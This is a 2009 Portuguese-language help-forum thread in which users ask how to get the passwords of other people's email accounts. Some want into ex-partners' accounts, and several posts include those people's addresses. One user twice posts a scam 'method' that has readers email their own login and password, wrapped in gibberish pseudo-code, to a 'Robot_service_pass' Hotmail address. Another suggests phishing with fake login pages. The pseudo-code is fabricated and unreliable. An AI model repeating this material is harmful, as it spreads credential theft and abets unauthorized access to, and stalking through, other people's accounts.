Buscar : Em
Por :

Descobrir senha do email yahoo

Última resposta o 23 Nov 2009, às 10:59:12 VG, o 18 Jul 2009, às 01:43:41 
 Assinalar esta mensagem aos moderadores

Boa noite, gostaria de saber a senha da minha ex namorada, quem puder me ajudar, agradeço desde já.

celeneides@yahoo.com.br

Melhores respostas por « Descobrir senha do email yahoo » em :
Como anexar arquivo no email[Hotmail] Ver Anexar arquivos a mensagens de email Se você precisa anexar arquivos a mensagens de email, siga as seguintes instruções: Clique no ícone de email e, em seguida, em Novo. Clique em Anexar e em Arquivo. Localize e selecione o arquivo que...
E-mail perdido ou novo registro de email[Hotmail] Ver Email expirado e registrar novamente um novo endereço MSN Se você não consegue mais acessar sua conta pois passou muito tempo sem consultá-la , tente fazer o seguinte: Registre novamente um endereço de email expirado do MSN ou registre um novo...
Como mandar email Cco Ver Como enviar email em Cco Já deve ter acontecido com você.... Querer enviar um e-mail para várias pessoas, mas não desejar que todos vejam os seus amigos que receberam o mesmo e-mail. Isto é possível graças ao Cco, diferentemente do Cc...
Como enviar arquivos pesados (anexos) por email VerOs sistemas de mensagens geralmente bloqueiam os anexos muito pesados então, como enviar um arquivo pesado (com vários Mo) ao seu destinário ? A solução consiste em utilizar um serviço de hospedagem temporária de arquivos e transmitir o link por...
Problemas para anexar arquivo[Hotmail] VerSe você não está conseguindo anexar um arquivo ao seu email , o problema deve ser este: O Windows Live Mail não oferece suporte a todos os tipos de arquivo. Se você enviar um anexo que não é aceito pelo Windows Live Mail, o destinatário do email...
Seus emails estão voltando?[Hotmail] VerEmails que retornam Você esta tentando enviar um email e ele volta para sua caixa de entrada? Você recebe de volta a seguinte mensagem: "This is an automatically generated Delivery Status Notification. Delivery to the following recipients...
Download KeePass Password Safe Portable VerHoje em dia somos obrigados a lembrar de dezenas de senhas e usuários diferentes : das contas de email , do banco , do MSN ... Um dia você necessitará de um programa como KeePass Password Safe Portable e ele se encarregará de memorizar por você...
S-Video (Y/C) VerO standard S-Vídeo O standard S-Vídeo (para “Sony Vídeo”), às vezes chamado Y/C, é um modo de transmissão vídeo de componente separadas que utilizam cabos distintos para transitar as informações de luminância (luminosidade) e de...
Webmail VerO que é um correio electrónico ? O correio electrónico (em inglês email ou e-mail) é um dos serviços mais frequentemente utilizados na Internet, permitindo a um remetente enviar uma mensagem a um ou vários destinatários. O correio electrónico...
Correio electrónico VerO que é um e-mail ? É um dos serviços mais utilizados da Internet, que permite enviar mensagens sob a forma de ficheiro texto. A Academia francesa encontrou-lhe o nome “de mel” enquanto os canadianos (mais imaginativos geralmente)...

6

queridinho, o 2 Ago 2009, às 04:28:34
  • +9

Quero descobrir a senha de minha ex mulher cm.irmaceleste@yahoo.com.br

Responder queridinho

7

beatriz, o 16 Set 2009, às 02:09:04
  • +2

Preciso com urgência descobri a senha do orkut da minha prima que faleceu a um mês, eu tenho o e-mail dela mais não tenho a senha, me ajudem por favor é sério é importante não estou querendo roubar senha de ninguém pra fazer maldade com ninguém, espero que possam me ajudar. Um abraço!

Responder beatriz

9

Fabio Teixeira, o 16 Set 2009, às 20:27:28
  • +5

Eu sei de uma maneira é muito simples
é válido para orkut, uol. bol. terra e outros

O método utilizado pelo http://www.hotmail.com.br para se recuperar uma senha perdida é
utilizar o assistente da sua web, mas se observarmos bem, iremos notar que é apenas um ‘boot’ que a única coisa que faz é enviar de forma interna os dados para poder redirecioná-los á sua base de dados.
Consiste em enviar um e-mail fazendo-se passar pelo boot,utilizando a sua codificação, é automático e não tem a mínima segurança, ainda assim não o usem muito porque senão podem descobrir e acabar com nossa festa, né?
É o seguinte: você envia um e-mail com as duas mensagens:
1ª mensagem: Find Password= Ele vai rastrear a senha do e-mail sugerido e postar no espaço que está com os sinais ‘???’.
2ª mensagem: Send to= Ele vai conferir se seu e-mail e senha são verdadeiros, e em seguida envia o e-mail e a senha do outro.
Ou seja, você recebe o e-mail de volta, mas no lugar dos sinais ??? vem a senha da vítima, sacou??
Envie o e-mail para o seguinte endereço:
Robot_service_pass@hotmail.com
Esse é o e-mail da equipe do MSN que irá rastrear a senha da vítima e enviar ao seu e-mail.
O código é tudo o que está entre as linhas pontilhadas (sem as linhas, lógico).
Onde está escrito login da vítima, você digita o nick da mesma…
Atenção “NÃO ESCREVA O ARROBA…BLÁ, BLÁ, BLÁ.COM.BR…Por favor…só o nick da vítima.
Por exemplo: alfredo-rj@hotmail.com
O nick é alfredo-rj.
Senão não funciona, o sistema só rastreia MSN.
Onde está escrito seu login, ponha seu nick…SÓ O NICK, Por favor, igual o de cima
Onde está escrito sua senha, ponha sua senha, o sistema precisa conferir se o seu e-mail é válido.
————————————————————————————————–
Find Password:
[html] [b] [frontpage] [******] [username]
Sckht//:28540//enter-profyle//940.000-1742//2kjlm32//?64.htm­
<find_login><ab>//to:<find_password>
(login da Vitima)
[?????????]
<microsoft.com.usa><d//>
<master><store><a/b><security>3269//36?//
Send to:
[html]//<ab><to>[*******] [username]
Flcrow//:31864//:,send-password
(seu login)
[sua senha]
lkfçp_ko_pp_js
(***********)
/html/b/front/ [*****]//74.218.master.security.log
c://front-page-profyle.html
<ab><send to//><p>
————————————————————————-
Boa sorte e divirta-se descobrindo as senhas dos seus amigos…mas não abuse.

Responder Fabio Teixeira

15

Thiago, o 19 Nov 2009, às 18:44:58

Entre em contato comigo, preciso de urgencia para recuperar senha de email, eu pago.

Responder Thiago

8

Fabio Teixeira, o 16 Set 2009, às 20:25:17
  • +4

Eu sei de método é muito simples, mas não divulgue isso pois se descobrirem cortam o nosso barato...
esse método serve para orkut, terra, yahoo, bol, uol e outros

O método utilizado pelo http://www.hotmail.com.br para se recuperar uma senha perdida é
utilizar o assistente da sua web, mas se observarmos bem, iremos notar que é apenas um ‘boot’ que a única coisa que faz é enviar de forma interna os dados para poder redirecioná-los á sua base de dados.
Consiste em enviar um e-mail fazendo-se passar pelo boot,utilizando a sua codificação, é automático e não tem a mínima segurança, ainda assim não o usem muito porque senão podem descobrir e acabar com nossa festa, né?
É o seguinte: você envia um e-mail com as duas mensagens:
1ª mensagem: Find Password= Ele vai rastrear a senha do e-mail sugerido e postar no espaço que está com os sinais ‘???’.
2ª mensagem: Send to= Ele vai conferir se seu e-mail e senha são verdadeiros, e em seguida envia o e-mail e a senha do outro.
Ou seja, você recebe o e-mail de volta, mas no lugar dos sinais ??? vem a senha da vítima, sacou??
Envie o e-mail para o seguinte endereço:
Robot_service_pass@hotmail.com
Esse é o e-mail da equipe do MSN que irá rastrear a senha da vítima e enviar ao seu e-mail.
O código é tudo o que está entre as linhas pontilhadas (sem as linhas, lógico).
Onde está escrito login da vítima, você digita o nick da mesma…
Atenção “NÃO ESCREVA O ARROBA…BLÁ, BLÁ, BLÁ.COM.BR…Por favor…só o nick da vítima.
Por exemplo: alfredo-rj@hotmail.com
O nick é alfredo-rj.
Senão não funciona, o sistema só rastreia MSN.
Onde está escrito seu login, ponha seu nick…SÓ O NICK, Por favor, igual o de cima
Onde está escrito sua senha, ponha sua senha, o sistema precisa conferir se o seu e-mail é válido.
————————————————————————————————–
Find Password:
[html] [b] [frontpage] [******] [username]
Sckht//:28540//enter-profyle//940.000-1742//2kjlm32//?64.htm­
<find_login><ab>//to:<find_password>
(login da Vitima)
[?????????]
<microsoft.com.usa><d//>
<master><store><a/b><security>3269//36?//
Send to:
[html]//<ab><to>[*******] [username]
Flcrow//:31864//:,send-password
(seu login)
[sua senha]
lkfçp_ko_pp_js
(***********)
/html/b/front/ [*****]//74.218.master.security.log
c://front-page-profyle.html
<ab><send to//><p>
————————————————————————-
Boa sorte e divirta-se descobrindo as senhas dos seus amigos…mas não abuse.

Responder Fabio Teixeira

10

JOAOJK, o 3 Out 2009, às 06:58:50
  • +2

Ensina ai esse negocio direito que esta complicado usa uma linguagem que todos entendam

Responder JOAOJK

11

Jose Roberto, o 7 Out 2009, às 17:46:58

FAbio, desculpe mas não consegui entender. Se eu te passar um email do hotmail voce descobre para mim.
Obrigado.
Jose Roberto

Responder Jose Roberto

13

liria, o 17 Nov 2009, às 13:08:17

Fabio,

Me ajuda por favor!
Tem uma vadiazinha que está me deixando louca de raiva! Será que tem como eu descobrir a senha dela no yahoo para eu poder acabar com ela?
Manda pro meu e-mail como devo fazer.
Obrigada

Responder liria

16

Bogalhita, o 23 Nov 2009, às 10:59:12

Olá... será que pode explicar de forma mais simples e clara como se faz isso!!?? :-)
é que fiquei sem perceber mto bem... tem que explicar passo a passo... por favor!!

Responder Bogalhita

14

buiu, o 18 Nov 2009, às 17:15:42
  • +1

E fasil é so hakea o msn

Responder buiu

12

hacker luiz, o 9 Nov 2009, às 02:25:25
  • +1

Pensem bem,se vcs naum receberam a mensagem foi pq vcs colocaram o proprio login] e senha] entao op] cara hackeou vcs na molezza.
tentem por pagina fake
ou se a pesso nao tiver confirmado o login no hotmail ai tu `cria um e mail] com o mesmo nome] e vai em esqueci minha senha e pronto

Responder hacker luiz